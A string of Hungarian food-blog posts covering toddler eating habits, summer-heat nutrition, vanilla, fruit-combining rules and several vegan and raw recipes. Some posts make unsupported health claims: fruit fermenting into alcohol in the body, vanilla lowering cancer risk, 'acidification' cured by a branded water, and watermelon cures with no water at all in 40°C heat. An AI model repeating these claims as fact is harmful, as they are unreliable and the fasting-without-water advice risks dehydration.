keverés, robotgép bekapcsolása, stb.), anyával/apával együtt megkóstolja nyersen a zöldségeket mielőtt az ételbe kerülnek, stb. Nagy az esély rá, hogy ha bevonjuk a gyereket a főzésbe, akkor utána nagyobb kedvvel kóstolja meg azt az ételt, amelynek az elkészítésében ő is részt vett.
5. Cukor “veszély”
Nálunk a cukor kimaradt Ádi étrendjéből két éves koráig! Persze édeset evett gyümölcsök és aszalt gyümölcsök formájában, de cukrosat nem. A süteményeket általában juharsziruppal, mézzel vagy kókuszcukorral készítem, ezekből most már szokott enni, de mivel nagyon-nagyon ritkán sütök, ezért kevés ilyen dolog kerül a tányérjára. Csokoládét még nem evett, kakaós dolgot viszont igen. Fagyit is idén kora nyártól kezdett először enni. Azt is többnyire én készítem és akkor a gyümölcsön kívül más édesítőszer nem is kerül bele, viszont, ha külső helyszínen esszük, akkor egy gombóc gyümölcs fagylalt bőven elég neki. Nem igazán rajong az édes dolgokért (sütemény, fagylalt), szóval nem is nagyon erőltetjük. A korai cukor étrendbe való bevezetésével megváltozhat az ember ízérzékelése és már nem fogja a zöldségeket/gyümölcsöket olyan édesnek érezni, mint, amilyenek valójában. Két év cukor “kihagyással” (úgyis fog még eleget enni életében) viszont elértük azt, hogy simán eszik nyersen citromot, lime-ot, meggyet, homoktövisbogyót és kíváncsisággal kóstolja meg a kevésbé édes zöldségeket is nyersen (brokkoli, karfiol, leveleskel, tök, stb.). Persze már most gondolkodom azon, hogy mi lesz, ha két gyerekünk lesz és a másodiknál is tartani szeretnénk azt, hogy két éves koráig ne egyen cukros dolgot… ez már nehezebb lesz, ha látja, hogy a bátyus eszik mondjuk egy muffint, akkor ő miért nem kaphat. Ezen még ráérünk, akkor gondolkodni, ha odaérünk, de el tudom képzelni, hogy arra az időszakra megint átállunk cukor/édesség mentes üzemmódba.
Cukor “veszély” leselkedhet ránk a különböző élelmiszerek összetevőjeként is, tehát legyünk türelmes címke olvasók és ne vegyünk olyan termékeket, amelyeknél a felsorolásnál az első összetevő a cukor… persze, ha a sokadik összetevő a cukor, akkor se vegyük meg. Igyekezzük kerülni a cukros élelmiszereket és lehetőleg minél később adjunk gyermekünknek ilyen ételt/italt.
6. Ital
Nyilván az első étel/ital az anyatej volt, emellett vizet kapott Ádi (nagyon meleg időben). Azóta is vizet iszik szomjoltásra, ez a kedvence. Ezenkívül nem cukrozott növényi tejet (rizs, zab, mandula) iszik és alkalmanként 100%-os zöldség vagy gyümölcslevet. Teát, gabonakávét nem adtam neki és természetesen cukros, szénsavas üdítőt sem. Néha ledöbbenek, hogy milyen fiatal, kicsi gyerekek kezében látok kolát vagy fantát. Kerüljük az ilyen italokat, valószínűleg tinédzser korban fog elég ilyet inni a gyerek (vagy nem… abban az esetben, ha példát mutatunk és mi sem iszunk… – én nem szeretem az ilyen italokat, tehát Ádi biztosan nem lát és fog látni engem kolát inni!).
7. Nyugalom és harmónia
Ha mi stresszelünk, hogy miért nem eszik a gyerek vagy már megint miért válogat vagy ha nem eszik, akkor nem jut elég tápanyag a szervezetébe, akkor ez a negatív energia érződni fog rajtunk és nem fogunk sikerrel járni. Fő a nyugalom! Ha van többféle alapanyag, étel a hűtőnkben, kamránkban, akkor biztosan nem fog a gyermek éhezni. Igyekezzünk nyugodtan “fogadni” a hóbortokat, a válogatást, általában változó időszak után újra be szokott állni a “rend”. Nálunk is fordultak elő ilyen időszakok, bár néha azt érzem, hogy Ádival igazán szerencsés vagyok, amiért ennyire kíváncsi és hajlandó minden zöldséget nyersen (is) megenni. Legyünk kreatívak és alkalmazzuk a fentebb leírt pontokat, biztos vagyok benne, hogy lesznek sikeres napjaink! Hajrá!
Helyes táplálkozás a nyári forróságban
2015. július 24. Éltető ételek
Nem egy mindennapos dolog, hogy napokig 40 fok körül van a hőmérő higanyszála. Még az erős, egészséges embereket is nagyon megviseli, nemhogy az időseket és a gyerekeket. Ilyenkor kifejezetten oda kell figyelni, hogy mit eszünk és iszunk. Bár azért a szervezetünk jelez, nem kívánja nehéz, zsíros ételeket. Jól esik ilyenkor a gyümölcsreggeli és a zöldségsaláta is. Amennyiben a makrobiotika elveit figyelembe vesszük, akkor figyeljünk a yin és yang ételek egyensúlyára. Hideg évszakokban melegítő hatású ételeket, nyáron hűtő hatású ételeket fogyasszunk. Az édes, fanyar és a keserű ízeket helyezzük előtérbe. A sós, csípős, savanyú ételek belülről fűtenek, jobb kerülni ezeket. Ugyanakkor az öt elem tana szerint kifejezetten jót tesznek a csípős, erős fűszerezésű ételek , mert az első pillanatban valóban fokozzák a hőséget, de végső soron felszínre hozzák és eloszlatják a test melegét. Ilyen fűszerek pl. a bors, chili, csípős paprika, gyömbér. Mit együnk? A nyers gyümölcsöknek, zöldségeknek kifejezetten hűtő hatásuk van. Reggelire tökéletes egy gyümölcsreggeli, vagy egy csírakása. A kolláth reggeli is kifejezetten hűtő hatású, hiszen szintén főzés nélkül készül el. Igazán tápláló a zöld turmix, a gyümölcsös smoothie. Készítsünk ebédre nyers gyümölcsleveseket, főételként együnk különböző gabonákat zöldségekkel (pl. raguval), főzelékeket. Nagyon jó hűtő hatása van a mungóbab levesnek, mely Kínában mindennapos eledel. Vacsorára könnyű zöldsaláták nemcsak finomak, hanem táplálóak is. Amennyiben főzzük az ételt, akkor az ételek készítése során a zöldségeket vékonyabbra (gyufaszál vastagságúra) vágjuk, és kevésbé főzzük meg. A legjobb a grillezés, a párolás, a wokban sütés, kerüljük a sütő használatát. Süssünk rövid ideig és magas hőfokon, gyorsan pároljuk meg az ételeket. Ezzel a módszerrel kevesebb energiát vesz fel az étel, így hűtő hatást kapunk. Mit igyunk? Elsősorban tiszta, buborékmentes, tisztított vizet. Kerüljük a cukros ivóleveket, teákat, szörpöket. Készítsünk friss gyümölcsökből fele víz hígítással turmixokat. Amennyiben teára szomjazunk, akkor borsmenta, fodormenta, hibiszkusz, citromfű, körömvirág, levendula, édeskömény teát is ihatunk. Nagyon fontos, hogy ilyenkor az izzadás fokozódik, ezért többet kell innunk a megszokottnál. De NE jeges italokat igyunk , mivel ezek leállítják az emésztést és utána sokkal fokozottabb lesz az izzadás. Ismeretes, hogy az arabok a nagy nyári melegben forrón isszák a mentateát . A menta önmagában is hűsítően hat a szervezetre, és a meleg tea elkortyolgatása után a szervezet hűteni kezdi az italt, így leadja a hőt. A jeges ital fogyasztása során ez pont fordítva történik, tehát a szervezet hőt termel, fokozódik az izzadás. Ugyanakkor az izzadással az ásványi anyagokat is fokozottan ürítjük, ezért az étkezéseknél ezek pótlására is oda kell figyelni. Gyakori az, hogy a szomjúságnak nem a vízhiány az első jele. Fejfájás, szédülés, koncentráció zavar esetén is jót tesz egy pohár víz. Hűtő hatású - gyümölcsök: alma, édes bogyós gyümölcsök, görögdinnye, sárgadinnye, déligyümölcsök - gabonák: köles, árpa, búza - zöldségek: brokkoli, paradicsom, uborka, cukkini, spárga, zöldbab, zöldborsó, karfiol, édesburgonya, zeller, fejes saláta, retek, spenót, tök - hüvelyesek: mungóbab, limabab, szójabab, vesebab - fűszerek: római kömény, édeskömény, koriander, tárkony - csírák - színek: fehér, világoskék, zöld Egy kis tisztítás Ilyenkor érdemes dinnyenapokat tartani. Jól tisztítja a méregtelenítő szerveket, a vesét, a májat és az ereket. Ha rászánjuk magunkat erre, akkor fontos, hogy ne együnk mellé semmi mást, még vizet se igyunk. Hetente 1-2 gyümölcsnap is igazán üdítő lehet ebben a nagy melegben. Válasszunk egy könnyedebb napot, akár hétvégét, vagy déltől másnap délig történő gyümölcs- és zöldségevést.
A vanília jótékony hatásai
2015. július 23. Élj harmóniában
Az egyik legismertebb édesség fűszer a vanília. Nincs is kellemesebb annál, mint amikor megérezzük a frissen sült vaníliás sütemény vagy egy frissen készült vaníliás ital illatát. Már az illata is gyógyír a léleknek. A vanília nagy mennyiségben tartalmaz antioxidánsokat, így véd a szabad gyökök ellen és csökkenti a a daganatos megbetegedések kialakulásának kockázatát. A vanília csökkenti a stresszt és segítik oldani a szorongást. Ellazító hatása van és ezért segít alvászavarok esetén is, mert jól nyugtatja az idegrendszert. Magas a vitamin és ásványi anyag tartalma (B vitaminok, kálcium, magnézium, kálium, cink) Segít a gyulladások kezelésében. Ellazító hatásának köszönhetően afrodiziákumként is használják. Felhasználása nagyon változatos: süteményekhez, joghurtokhoz, tejes édességekhez, turmixokhoz, kompótokhoz, gyümölcsös ételekhez, fagylaltokhoz, müzlikhez, kásákhoz, Későbbiekben a blogon, majd néhány receptet is közzé teszek:) Nem csak étkezésnél fogyasztható, de aromaterápiás hatása is kiváló. Kis mennyiségben használd, mert nagy mennyiségben ellenkező hatást fejthet ki.
Hogyan táplálkozzunk a nyári hőségben?
Itt a nyári szabadságok ideje és az ember önkéntelenül is érzi, hogy minél több időt akar a szabadban, természetben lenni!
Kevésbé ismert az a nézet , hogy a nyári tikkasztó hőség gyógyhatású, mert sok feleslegestől szabadíthat meg, felkészíti és felerősíti szervezetünket a későbbi nagy teljesítményre.
Mint mindig, ilyenkor is a legjobb ha követjük a természet törvényeit és a nyár bőség-asztaláról válogatunk.
Hibás, hogy ha ilyenkor is a megszokott, főtt-sült, zacskós, dobozos ételeket részesítjük előnyben.
A táplálkozásnak mindig alkalmazkodnia kell az évszakokhoz.
Ne felejtsük el azt a fontos természeti törvényt sem, hogy a gyümölcsöket, zöldségeket mindig akkor együk amikor a természet felkínálja azokat!
Kivétel néhány hasznos déli gyümölcs, mint például a citrom, grapefruit és az ananász.
Nézzük a nyár kínálta gyümölcsöket, zöldségeket és azok helyes társítását!
Az “r” nélküli hónapokat éljük és ilyenkor mellőzük a kenyeret, a túlzott keményítő és szénhidrát tartalmú ételek fogyasztását.
Most a nyers koszt van napirenden, ezért kerüljük a nehéz, tartalmas ételeket. Ha nem 100%-ban tudjuk megvalósítani a nyers kosztot, akkor tartsuk szem előtt a 80/20 szabályt. tehát 80 %-ban nyers zöldség, gyümölcsöket fogyasztunk és 20%-ban főtt ételeket.
Fontos még a nem nyári időszakban is, hogy a főtt, sült ételekhez fogyasszunk valami “nyerset”: salátákat, csírákat, stb.
Fő táplálékaink a friss gyümölcsök, nyers, esetleg sült, párolt zöldségek, könnyen emészthető gabonák: mint például a köles, amarant, kukorica, árpa és friss zöld fűszernövények legyenek.
Természetesen fogyaszthatunk más ételeket is, de kevesebbet, részesítsük előnyben a fent felsoroltakat.
Gyümölcsök fogyasztása kúraszerűen ajánlott!
Többször hangsúlyoztam, hogy a gyümölcsök fogyasztása, csak akkor hasznos és egészséges, nem savasító ha helyesen fogyasztjuk őket.
Fontos szabály a gyümölcs fogyasztásánál, hogy csakis egyfajtát fogyasszunk egyszerre és ha csak nem gyümölcs napot tartunk akkor a gyümölcs evést korlátozzuk a reggeli- délelőtti órákra.
A gyümölcsök cukortartalma miatt, már önmagukban is képesek erjedni, ezért könnyen visszafele sülhet el a fogyasztásuk.
Ugyanis az erjedésnek alkohol képződés a vége, amelyet a májnak ugyanúgy le kell bontania!
Ha mégis kétfajta gyümölcsöt keverünk akkor ne felejtsük el az erjedésgátló fűszereket alkalmazni, mint például a : fahéj, gyömbér, vanília, ánizs, szerecsendió, édeskömény.
Az alma az egyetlen kivétel, amelyet bármilyen gyümölccsel fogyaszthatunk együtt, habár én ilyenkor is javaslom az erjedésgátló fűszereket a savasodás elkerülése végett!
A gyümölcsök gyakorlatilag csak akkor nem savasítanak, ha kúraszerűen, önmagukban fogyasztjuk őket.
A májunkra van jó hatással a szamóca, málna, egres, akkor ha reggel- délelőtt fogyasztjuk őket és önmagukban.
Mindenfajta dinnye ideje a nyár . A sárgadinnye használ a húgyhólyagnak, a görögdinnye a májat, vesét méregteleníti. Ilyenkor kitűnő méregtelenítő kúrát csinálhatunk 2-3 napos dinnyekúrával.
3 napig akár csak görögdinnyét fogyasszunk kevés fahéjjal megszórva.
Plusz folyadékot nem szükséges mellé fogyasztani, mert desztillált víz tartalma szépen átmossa szervezetünket.
Hibás társítás a sárgadinnyét desszertnek fogyasztani, vagy sonkával, előételnek.
Rossz belegondolni, hogy mi lesz az emésztés végeredménye!
A sárgabarack az izmokat erősíti, csak teljesen érett sárgabarackot fogyasszunk.
Óvakodjunk a túlérett gyümölcsöktől is, mert ott már elindult az erjedési folyamat, 37 C fokon pedig tovább folytatódik ha megesszük.
Az őszibarack nagyon jó vízpotló, frissít és sok tápláló folyadékkal látja el a szervezetünket. Szintén önmagában fogyasszuk, amennyi jólesik!
Nyár végén megjelenik a szőlő. Kúraszerűen ajánlott szintén fogyasztani, amikor napi 2-3 kg.-nyi mennyiséget is megehetünk. Regeneráló, roboráló, méregtelenítő hatású. Nagyszerű minden gyomor bajnál.
A bőrünk megszépül, kivirul tőle.
Viszont ha nem teljes az egészségünk akkor takarékosan fogyasszuk, mert a túl sok édes szőlő emeli a vércukorszintet.
Magas cukortartalma miatt őt is szigorúan tilos együtt fogyasztani bármivel.
Ha fogyasztása során, után erős hashajtó hatását észleljük ( ami nem baj, mivel méregtelenít), vagy úgy érezzük, hogy kissé savasított még önmagában fogyasztva is, igyunk meg egy pohár NEUROSAN-os vizet. Semlegesíti, megköti a savakat. Bármikor máskor is alkalmazhatjuk, ha úgy érezzük, hogy a savasodás felütötte a fejét.
Zöldségekkel könnyebb a dolgunk, mivel szinte kivétel nélkül mindegyik lúgosít, tisztít.
Fogyaszthatjuk őket együtt szénhidrát, keményítő és fehérje tartalmú ételekkel.
Természetesen nem egyszerre mindezt hanem külön-külön!
Minél több nyers salátát, hidegen sajtolt olajokkal együtt ehetjük, így segítjük a zsírban oldódó vitaminok felszívódását.
Fogyaszthatjuk a zöldségeket, mivel roppant ízletesek szabadban grillezve, enyhén megpárolva, minden nap szakban akár.
Vegyes saláta a legjobb hűsítő étel a forró időszakban, kevés hidegen sajtolt olíva olajjal.
Hűtő hatású gabona a köles és az árpa, amarant. Utóbbinak rendkívül magas az ásványianyag tartalma.
Sokan azt hiszik, hogy a szomjúságot, vagy a hőséget jeges víz, vagy jeges, hűtött, ételek, kólák bőséges élvezete által kell leküzdeni, nekik azonban gyakran meghűléssel, vagy gyomorgörccsel kell küszködniük, ilyen esetben inni kell egy csésze forró gyömbér teát.
Szilvás galette
A galette, a franciák pitéje édes és sós változatban is létezik. Azt mondják, már a 12. században is ismert volt. Napjainkban a legismertebb a Normandiában, vízkeresztkor készített édesség. Ebb?l a mennyiségb?l 3 kisebb vagy két nagyobb méret? darab lesz. Hozzávalók: A tésztához: 5 dkg teljes...
Vendégvárásra fel! - Házi készítésű, gyümölcs smoothie jégkrém és jégkása (gluténmentes, laktózmentes, tojásmentes, vegán, nyers)
házi készítésű, gyümölcs smoothie jégkrém (mindenmentes, vegán, nyers) Telis tele van az Internet, jobbnál jobb, házi készítésű fagylalt és jégkrém receptekkel. Van köztük egyszerű gyümölcsös, tejmentes a laktózérzékenyeknek, hozzáadott cukormentes, adalékanyagmentes, de akár luxus fagylaltokat is találhatunk, exkluzív hozzávalókkal (pl.:ehető aranypor). :-) Az elmúlt pár hétben, olyan sok fagylalt fényképet láttam, hogy még én is megkívántam ezt a klasszikus, hűsítő édességet, melyet több ezer éve fogyaszt már az emberiség. Itt a szeles Írországban, ahol jelenleg töltöm napjaimat, elég ritkán találkozik az ember azzal az érzéssel, hogy "hú, de meg ennék egy jó kis fagyit, hogy könnyebb legyen elviselni ezt a nagy meleget!" :-D házi készítésű, gyümölcs smoothie jégkrém (mindenmentes, vegán, nyers) Aznap, amikor a gondolat végleg befészkelte magát a fejembe, hogy, készíteni kéne valami házi, gyümölcsös hűsítőt, másnapra vendégeket vártunk. Így hát elérkezettnek láttam az időt, hogy kipróbáljam ezt is! Persze lehetőleg vegán mindenmentesen, hogy minden vendégünk számára ehető legyen, és egyszerű, gyors formában, fagyi gép nélkül (mert az nincs itthon). Nézegettem a házi készítésű fagylaltok receptjeit, de semmi kedvem nem volt óránként kivenni a fagyasztóból, és újra meg újra összeturmixolni a fagyi krémet, hogy krémes maradjon. Vendégeket vártunk így, más ételek készítésére fordítottam inkább az időmet és energiámat... "Jeges hűsítő kisokos a 100fok bloggereitől... gyümölcs smoothie jégkrém (vegán, nyers) Fagylalt: Gyümölcs-, kávé-, csokoládé- és más alapú mélyhűtött desszert, ízesíthető alkohollal. Többnyire tejjel, tejszínnel és tojássárgájával készítik, főzik. Jégkrém: Alapanyagokat tekintve nagyon hasonló a fagylalthoz. Lehet akár csak gyümölcsös alapú, de készülhet tejszínnel is és csokibevonattal. Formába öntve fagyasztjuk. Semifreddo: Ahogyan neve is jelenti, ez egy félig fagyasztott desszert, fagylalt torta vagy sütemény. Granita (jégkása): Olasz eredetű szemcsés textúrájú, kásás állagú, enyhén édesített, félig fagyasztott desszert. Egyszerű gyümölcsszirupból vagy kávéval, esetleg likőrrel ízesítve készül. Egyéb változatai készülhetnek zöldségből és friss fűszernövényekből is. Sorbet: Jeges desszert, amely nem tartalmaz zsíros anyagokat, tojássárgáját, így kevésbé szilárd és szemcsésebb az állaga a fagylaltnál. Alapanyaga gyümölcslé vagy gyümölcspép, de kerülhet bele bor, pezsgő, vodka, likőr vagy gyógytea is. Többnyire cukorsziruppal, mézzel édesítik. Fagyasztás alatt állandó keverést igényel. Parfé: Hasonló alapanyagokból készíthető, mint a fagylalt, 5-6 óra hűtést igényel. Általában valamilyen sütemény formában készül, így a fagyasztás után tortaként szeletelhető." Forrás: 100fok gyümölcs smoothie jégkrém (vegán, nyers) Házi fagyik terén nagyon kezdő vagyok. Ígérem a jövő nyárra tovább fejlődöm, addig pedig fogadjátok sok szeretettel első próbálkozásaimat! ;-) Hogy mi lett belőle? Hát nem tudom, minek is nevezzem? Az előbb megmutattam nektek a nyári hűsítők legfőbb kategóriáit, és ti is láthattátok, hogy az én receptem egyikbe sem illik bele! :-D Ez egy gyümölcsös, mindenmentes, egészséges, diétás, finom, hűsítő édesség, ami egyszerűen elkészíthető egy jégkockatartó segítségével bármilyen gyümölcsből! Azt hiszem a leginkább a "hűsítő smoothie kockák" elnevezés illik rá a legjobban. Sem hozzáadott cukrot, sem ételszinezéket, vagy mesterséges ízfokozót nem tartalmaznak ezek az egészséges és könnyen emészthető, gyomorbarát fagyasztott gyümölcs kockák! (Ha nagyon muszáj skatulyát húznom rá, akkor talán a sorbetre hasonlít leginkább.) HOZZÁVALÓK: (1 tálca smoothie jégkockához) - 1 db érett banán - 1 db érett mangó húsa / vagy 150 g málna / vagy 3 db érett kivi / vagy 1/2 kisebb érett sárgdinnye (a képeken, ezekből a gyümölcsökből készült jégkrémek láthatóak) - 1 dl mandula tej - 1 dl tiszta víz házi készítésű, gyümölcs smoothie jégkrém, "nyers tejszínhabbal" (mindenmentes, vegán, nyers) ELKÉSZÍTÉS:A hozzávalókat bele tesszük a turmix gépünkbe, pontosan ugyanúgy, mint ahogyan a gyümölcs turmixokat készítjük. A kész turmixokat beletöltjük a szilikonos jégkockatartó formába és mehet is be a fagyasztóba. Másnap már fogyasztható is az intenzív gyümölcs ízű házi jégkrém! Többféle formában is felszolgálhatjuk a vendégeknek. Tálalhatjuk fagyis kelyhekben a különböző ízesítésű smoothie kockákat, vagy ha van otthon akkor elkészíthetjük pálcikás jégkrémtartóban is. Tehetünk rá "nyers tejszínhabot", amit ezesetben egy leturmixolt banán helyettesít. Sokkal lágyabb, és krémesebb lesz tőle a házi hűsítőnk! :-) gyümölcs smoothie jégkrém, "nyers tejszínhabbal" (mindenmentes, vegán, nyers) Ha nincs kedvünk a gyümölcs kockákat lassacskán elfogyasztani, akkor turmixoljuk szét őket egy kevés vízzel, és már kész is a hideg és gyümölcsös jégkása, hozzáadott cukor nélkül! házi készítésű, gyümölcsös jégkása (mindenmentes, vegán, nyers) Kis esernyőkkel, szívószálakkal, különböző színes és nyárias kiegészítőkkel feldíszítve, a gyerekzsúrokon is nagy sikert fogunk aratni. ;-) A felhasznált ízeket és színeket, azaz a gyümölcsöket, kedvünk szerint variálhatjuk. Készíthetünk például szedfres, áfonyás, dinnyés, epres, barackos, ananászos, de akár papajás vagy citromos gyümölcs smoothie jékrémet is. A lehetőségek határtalanok... házi készítésű, gyümölcs smoothie jégkrém (mindenmentes, vegán, nyers) Táplálkozz, ne csak étkezz! És eszerint gondoskodj a vendégeidről is! ;-)
Málnafagyi csokidarabkákkal
Nagyon nagyon meleg van, a bolti jégkrém pedig mérgező és méreg drága. Így megint beindult a fantáziám ;) Hozzávalók: 1/2 kg málna 1 banán 2 ek kókuszreszelék 1 ek kókusztejpor 1 kk vanília 1 ek darált lenmag 1 dl forrásvíz 5 ek méz, vagy más édesítő. Vad édesnek kell lennie, mert a fagyasztás elvesz az […]
Pikk-pakk kész, főzésmentes zöldségleves gazdagon (gluténmentes, laktózmentes, tojásmentes, vegán, nyers)
Ennek a posztnak azt a címet is adhattam volna, hogy Pak Choi leves nyersen újratöltve! :-D Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindementes, vegán, nyers) Megint jön a kánikula... Szerintem senkinek nem mondok vele újat, ha azt írom, hogy a nagy melegben mindenki a lédús, friss és üde ételekre, sok sok folyadékra, nyers és roppanós zöldségekre, édes gyümölcsökre vágyik! Ilyenkor nem is egészséges túlzásba vinni a főtt, sült, fűszeres ételek fogyasztását. Vérbeli magyarként azonban, nem túl sok nyers, párolt, természetes ételt ismerünk. Alig tudjuk elképzelni, hogy a hagyományos zöld leveles salátákon túl is van élet, ha könnyed ételt szeretnénk fogyasztani! ;-) Egy ilyen, kánikulában is tökéletesen frissítő, energiadús és tápanyagban gazdag, újabb pikk-pakk kész receptet hoztam nektek. Egy zöldséglevest, melyhez nem kell bekapcsolni a tűzhelyet, csakis természetes és friss alapanyagokból készül, nagyon ízletes és még szemet gyönyörködtető is. Még egy példa rá, hogy nem csak hideg gyümölcslevest lehet készíteni főzés nélkül! ;-) Pak choi zöldségleves Májusban bemutattam nektek itt a Zöld Avocado blogon, hogy mi is az a Pak choi, és hogyan készíthetünk belőle egyszerűen nagyszerű, finom zöldséglevest. Kaptam néhány visszajelzést, hogy kipróbáltátok, és rettentően ízlett nektek is! :-) Az akkori recept megjelenés után felvetődött egy kérdés egy nyersétkezős olvasótól, amit én nem tudtam figyelmenkívül hagyni, így természetesen "Challenge accepted!", itt a megoldás rá! :-) A feldobott labda pedig az volt, hogy hogyan lehetne elkészíteni ennek a levesnek a nyers változatát, olvasóknak, akik nem fogyasztanak hőkezelt ételeket? A válasz hamar megszületett bennem, és most, hogy mindenki olyan recepteket keres, amikkel könnyebb átvészelni a fülledt, meleg nyári napokat, azt hiszem tökéletes az időzítés, hogy megosszam veletek. nyers gyümölcsös kókuszgolyóknyers kókuszos kosárkák Egyre többen vannak a világban, azok az emberek, akik nem fogyasztanak semmiféle hőkezelt ételt, csakis nyersen elkészíthető, ún. élő ételekkel (raw food) táplálják a testüket. Ezt az irányzatot enzimtáplálkozásnak, vagy NYERS (VEGÁN) TÁPLÁLKOZÁSnak is hívják. A zöldségek, gyümölcsök a hő hatására sajnos elveszítik vitamin tartalmuk nagy részét, illetve az egészséges táplálkozáshoz szükséges teljes enzim tartalmukat, ezért a nyersétkezők minden növényi alapanyagot úgy fogyasztanak, ahogyan azt a természet megalkotta, nyersen. :-) Az aszalás az egyetlen technológia, ami engedélyezett az irányzat követői számára. (40°C még az a maximum hőmérséklet, ahol a vitaminok és enzimek még nem sérülnek.) Ha teheted, te is fogyassz minél több nyers és friss, tápanyagban és enzimben gazdag, és kevesebb feldolgozott ételt! Segítsünk, hogy igaz legyen Hippokratész egyik elhíresült mondása: ,,Ételed legyen orvosságod, orvosságod legyen ételed. Bővebben a nyers vegán táplálkozásról Antal Vali oldalán, vagy Urbán Vali oldalán a nyersetel.hu-n is olvashatsz. Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers) HOZZÁVALÓK (kb.4 főnek): az alapléhez: - 1 db pak choi vagy mángold - 1 szál szárzeller - 1/4 lila hagyma - 1-1,5 liter tiszta víz - Himalája só, frissen őrölt fekete bors - 2 ek sörélesztőpehely a leves tartalmához: - 2 db közepes sárgarépa felkarikázva - 1 marék karfiol apró rózsákra szedve, mint galuskák a levesben - 1/2 db sárga (kaliforniai) paprika - 1 marék friss petrezselyem - 1 bögre zöldborsó Minden hozzávalót frissen és nyersen használunk fel ebben a levesben. Mivel kevés a hozzáadott fűszer, és hőkezelés sem éri a zöldségeket, ezért az össz ízhatást nagyban befolyásolja, hogy milyen finom zöldségeket használunk. Próbáljunk meg jó minőségű, kisebb gazdaságokból származó, bio alapanyagokat használni! Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers) ELKÉSZÍTÉS: Ez egy újabb egyszerűen elkészíthető, pikk-pakk kész, életerőben gazdag, élő leves, amit akár a konyhában idegenként mozgó családtagjaink (férj, feleség, gyerekek) is bármikor meglephet minket vele! ;-) Össze kell csak dobálni a hozzávalókat, a turmix gépbe, majd egy tálba, és kész is. :-) Ezt pedig bárki meg tudja csinálni! ;-) A leves alapléhez szükséges hozzávalóit a fűszerek nélkül (zeller, pak choi vagy mángold, lila hagyma, víz) tegyük a turmixgépbe, és jó alaposan dolgoztassuk össze vele, míg egy teljesen híg levet nem kapunk. Öntsük az egészet egy nagyobb tálba, vagy akár leveses edénybe, majd tegyük hozzá a fűszereket ízlés szerint (Só, bors és sörélesztőpehely), és keverjük el. Most mehetnek bele az előre felaprított rágnivaló részek (karfiol, borsó, paprika, répa). Használhatunk egyéb, nyersen is fogyasztható zöldségeket kedvünk szerint (pl.: cukkini, brokkoli). Mindent nyersen, hőkezelés nélkül használjunk, így sokkal értékesebbek, mert a hőre érzékeny vitaminok is megmaradnak. Ettől lesz olyan energiadús, és friss, aminek köszönhetően mi is új erőre kapunk a nagy melegben! ;-) Amint beleszórtunk mindent a fűszeres alaplébe, már tálalhatunk is! Ugye, hogy gyors volt? ;-) Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers) Táplálékban, energiában és frissességben gazdag jó étvágyat kívánunk ehhez a hűsítő, enzimgazdag zöldségleveshez! ;-) Megjegyzés1: Ha már nem kaptok Pak choi-t a jól bevált zöldségeseteknél (elméletben már vége a tavaszi pak choi szezonnak), akkor sem kell elmenteni ezt a receptet a következő szezonig, mert helyette használhatunk mángoldot is. Ugyanolyan finom leves lé készül belőle! Próbáljátok ki! :-) Megjegyzés2: Sokkal finomabb, mint ahogy azt a fejemben előre gondoltam! Meglepően abbahagyhatatlanul finom és még tápláló is lett ez a leves! A sok sok rágnivaló pedig gondoskodik róla, hogy jól lakjunk, a rengeteg vitaminnak, ásványi anyagnak, nyomelemnek, és enzimnek köszönhetően pedig még gyógyítjuk is a testünket közben! ;-) Pikk-pakk kész, főzésmentes zöldségleves gazdagon (mindenmentes, vegán, nyers)
Citromos bulgurral töltött sült paradicsomok (vegán)
2015. július 12. Zizi kalandjai
Hatalmasat vakációztunk Ádival a szüleimnél Szegeden. Hihetetlen, hogy mennyit jelent, ha még rajtam kívül három ember pörög Ádi körül (I. maradt Budapesten dolgozni). Annyi kaland történt Ádival egy-egy nap alatt, mint Budapesten egy hónap alatt. A kenyér és kalács dagasztástól a sütésig, a kertészkedésig, a strandolásig, a szökőkútban pancsolásig, a tyúk kergetésig (tyúk kergetése vissza a szomszédba), a koncert hallgatásig, naponta számtalan élmény érte, sok új dolgot tanult és én élveztem a legjobban, hogy ő milyen jól érzi magát. Egy hét múlva megyünk is vissza Szegedre, hogy még több új élményt gyűjtsünk.
Pár bejegyzés be is volt készítve, de nem vitt rá a lélek, hogy leüljek a gép elé blog bejegyzést írni. A blog is vakációzik, most nyáron kicsit lazábban haladnak a dolgok. Recept azért van, szóval nem maradtok finomságok nélkül, amikor végre gép elé kerülök. Íme egy néhány hete készült töltött sült paradicsom… az ötlet Donal Skehan-tól jött, vagyis az Instagramjáról, amikor egy képhez leírta, hogy a görög szigeten, Ikaria-n szinte csak zöldségeket és vegetáriánus ételeket esznek az ott élők és csak nagyon ritkán fogyasztanak húst. Egyből felkerült Ikaria a bakancslistámra, egyszer mindenképpen szeretnék oda elutazni!
Szóval a képen fincsi töltött sült zöldségek vannak… megkívántam én is, amúgy is régóta akartam töltött paradicsomot készíteni. Az enyémbe bulgur került citrommal és bazsalikommal ízesítve. A tetejére egy kis reszelt vegán sajt, majd a paradicsom kalapja és már toltam is be őket a sütőbe. Salátával tálalva gyors nyári ebéd!
Citromos bulgurral töltött sült paradicsomok (vegán)
Hozzávalók 3-4 főre (7-8 paradicsomhoz):
– 7-8 db nagyobb paradicsom
– 1 bögre bulgur
– 1/2 citrom leve
– néhány levél bazsalikom, felaprítva
– 1 gerezd fokhagyma, felaprítva
– 1 kis fej vöröshagyma, felaprítva
– 100 g vegán sajt, reszelve
– só, bors
– extra szűz olívaolaj
A bulgurt mossuk át, tegyük egy lábasba és öntsük fel kétszeres mennyiségű vízzel. Adjuk hozzá a fél citrom kifacsart levét, a vöröshagymát, a fokhagymát, sózzuk, borsozzuk és 10-15 perc alatt főzzük meg (a bulgur beszívja magába az összes vizet). Tegyük félre hűlni.
A paradicsomoknak vágjuk le a tetejét óvatosan, hogy utána még vissza tudjuk rá helyezni őket. Teáskanál segítségével kivájjuk a paradicsomok belsejét: a magokat és a levét, ezt felhasználhatjuk salátához vagy megehetjük magában.
A langyosra hűlt citromos bulgurhoz adjuk a bazsalikomleveleket, keverjük össze, majd kezdjük el betölteni a paradicsomokat (valószínűleg fog kimaradni bulgur, ezt köretként megehetjük az elkészült paradicsomokhoz). Mindegyikre tegyünk egy kevés reszelt sajtot, majd tegyük rájuk a levágott paradicsom tetőket és helyezzük sütőtálba. Locsoljuk meg olívaolajjal és előmelegített sütőben süssük meg 180C fokon kb. 25-30 perc alatt.
